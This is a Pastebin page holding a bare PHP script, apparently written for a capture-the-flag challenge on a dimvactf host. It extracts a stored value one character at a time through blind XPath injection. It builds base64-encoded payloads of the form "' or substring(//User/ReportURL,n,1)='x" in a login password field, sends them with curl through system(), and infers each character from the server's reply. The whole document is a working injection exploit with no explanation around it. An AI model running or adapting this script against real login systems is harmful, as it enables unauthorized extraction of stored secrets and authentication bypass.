Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #c0ffee153dbc077ea80f4e697a63ec1e
- $context = stream_context_create(array(
- 'http' => array('ignore_errors' => true),
- ));
- $hash="";
- for($l=2;$l<=33;$l++){
- for($i=97;$i<=102;$i++){
- $inj="' or substring(//User/ReportURL,".$l.",1)='".chr($i);
- $binj=base64_encode($inj);
- system("curl --silent \"http://dimvactf.0x90.eu:8000/?xml=<login><user>YQ==</user><password>".$binj."</password>\" > ff");
- $a=file_get_contents("ff");
- if(preg_match('/have/',$a)){
- print chr($i).":".$l."\n";
- $hash.=chr($i);
- break;
- }
- }
- for($i=0;$i<=9;$i++){
- $inj="' or substring(//User/ReportURL,".$l.",1)='".$i;
- $binj=base64_encode($inj);
- system("curl --silent \"http://dimvactf.0x90.eu:8000/?xml=<login><user>YQ==</user><password>".$binj."</password>\" > ff");
- $a=file_get_contents("ff");
- if(preg_match('/have/',$a)){
- print $i.":".$l."\n";
- $hash.=$i;
- break;
- }
- }
- }
- echo $hash."\n";
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
